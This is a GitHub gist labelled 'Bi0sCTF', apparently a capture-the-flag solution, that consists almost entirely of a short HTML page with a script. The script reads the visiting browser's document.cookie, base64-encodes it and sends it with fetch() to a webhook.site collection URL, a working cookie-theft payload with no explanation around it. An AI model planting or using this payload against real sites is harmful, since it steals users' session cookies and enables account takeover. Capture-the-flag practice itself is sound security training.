Skip to content

Instantly share code, notes, and snippets.

@lebathang
Created June 8, 2025 10:11
Show Gist options
  • Save lebathang/afa11c7f65afd52a83c854eb12824445 to your computer and use it in GitHub Desktop.
Save lebathang/afa11c7f65afd52a83c854eb12824445 to your computer and use it in GitHub Desktop.
Bi0sCTF
<!DOCTYPE html>
<html>
<body>
<script>
fetch(' https://webhook.site/e556ad50-cae6-4277-b26e-c3298d65b967?data=' + btoa(document.cookie));
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment